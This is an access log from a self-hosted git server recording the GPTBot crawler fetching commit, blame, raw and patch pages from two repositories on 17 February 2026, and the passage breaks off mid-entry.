[Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.7" +[17/Feb/2026:13:25:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.2" [Client 74.7.227.38] [Length 9942] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.2" +[17/Feb/2026:13:25:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.6" [Client 74.7.227.38] [Length 9921] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.6" +[17/Feb/2026:13:25:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.7" [Client 74.7.227.38] [Length 9914] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.7" +[17/Feb/2026:13:25:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.1" [Client 74.7.227.38] [Length 9912] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.1" +[17/Feb/2026:13:25:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 71829] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" +[17/Feb/2026:13:25:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" [Client 74.7.227.38] [Length 15176] [Gzip 4.64] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" +[17/Feb/2026:13:25:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.5" [Client 74.7.227.38] [Length 9920] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.5" +[17/Feb/2026:13:25:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.6" [Client 74.7.227.38] [Length 9950] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.6" +[17/Feb/2026:13:25:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 71825] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" +[17/Feb/2026:13:25:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.4" [Client 74.7.227.38] [Length 9914] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.4" +[17/Feb/2026:13:25:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.3" [Client 74.7.227.38] [Length 9944] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.3" +[17/Feb/2026:13:25:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.2" [Client 74.7.227.38] [Length 9914] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.2" +[17/Feb/2026:13:25:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.4" [Client 74.7.227.38] [Length 9942] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.4" +[17/Feb/2026:13:25:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.5" [Client 74.7.227.38] [Length 9949] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.5" +[17/Feb/2026:13:25:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.1" [Client 74.7.227.38] [Length 9941] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.1" +[17/Feb/2026:13:25:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 137900] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:13:25:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" [Client 74.7.227.38] [Length 2253] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" +[17/Feb/2026:13:25:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" [Client 74.7.227.38] [Length 14877] [Gzip 8.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" +[17/Feb/2026:13:25:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/fallback_stream_access.log" [Client 74.7.227.38] [Length 9948] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/fallback_stream_access.log" +[17/Feb/2026:13:25:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 137890] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:13:25:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/fallback_stream_access.log" [Client 74.7.227.38] [Length 9921] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/fallback_stream_access.log" +[17/Feb/2026:13:25:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/fallback_stream_access.log" [Client 74.7.227.38] [Length 9949] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/fallback_stream_access.log" +[17/Feb/2026:13:25:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/docker-compose.yml" [Client 74.7.227.38] [Length 12585] [Gzip 3.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03" +[17/Feb/2026:13:25:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/mail_contact.py" [Client 74.7.227.38] [Length 16070] [Gzip 5.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a" +[17/Feb/2026:13:25:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/update_status.py" [Client 74.7.227.38] [Length 12949] [Gzip 3.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a" +[17/Feb/2026:13:25:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6.patch" [Client 74.7.227.38] [Length 24597416] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6" +[17/Feb/2026:13:25:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8.patch" [Client 74.7.227.38] [Length 127902] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8" +[17/Feb/2026:13:25:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project" [Client 74.7.227.38] [Length 9897] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project" +[17/Feb/2026:13:25:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/README.md" [Client 74.7.227.38] [Length 9850] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/README.md" +[17/Feb/2026:13:25:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746.patch" [Client 74.7.227.38] [Length 1291] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746" +[17/Feb/2026:13:25:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8.diff" [Client 74.7.227.38] [Length 127400] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8" +[17/Feb/2026:13:25:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2.patch" [Client 74.7.227.38] [Length 6621] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2" +[17/Feb/2026:13:25:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs" [Client 74.7.227.38] [Length 11038] [Gzip 4.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data" +[17/Feb/2026:13:25:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/docker-compose.yml" [Client 74.7.227.38] [Length 10529] [Gzip 3.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/docker-compose.yml" +[17/Feb/2026:13:25:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/mail_contact.py" [Client 74.7.227.38] [Length 10140] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/mail_contact.py" +[17/Feb/2026:13:25:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/update_status.py" [Client 74.7.227.38] [Length 9872] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/update_status.py" +[17/Feb/2026:13:25:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/docker-compose.yml" [Client 74.7.227.38] [Length 13572] [Gzip 6.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/docker-compose.yml" +[17/Feb/2026:13:25:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/update_status.py" [Client 74.7.227.38] [Length 12468] [Gzip 5.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/update_status.py" +[17/Feb/2026:13:25:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/mail_contact.py" [Client 74.7.227.38] [Length 18808] [Gzip 9.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/mail_contact.py" +[17/Feb/2026:13:25:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/docker-compose.yml" [Client 74.7.227.38] [Length 1058] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/docker-compose.yml" +[17/Feb/2026:13:25:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/mail_contact.py" [Client 74.7.227.38] [Length 3922] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/mail_contact.py" +[17/Feb/2026:13:25:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/update_status.py" [Client 74.7.227.38] [Length 1390] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/update_status.py" +[17/Feb/2026:13:25:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/nginx" [Client 74.7.227.38] [Length 9869] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/nginx/proxy_host" +[17/Feb/2026:13:25:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/fallback_stream_access.log" [Client 74.7.227.38] [Length 10971] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs" +[17/Feb/2026:13:25:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/fallback_error.log" [Client 74.7.227.38] [Length 11396] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs" +[17/Feb/2026:13:25:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log.1" [Client 74.7.227.38] [Length 33620] [Gzip 6.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs" +[17/Feb/2026:13:25:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log.6" [Client 74.7.227.38] [Length 35829] [Gzip 6.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs" +[17/Feb/2026:13:25:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log.7" [Client 74.7.227.38] [Length 10960] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs" +[17/Feb/2026:13:25:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log.3" [Client 74.7.227.38] [Length 38752] [Gzip 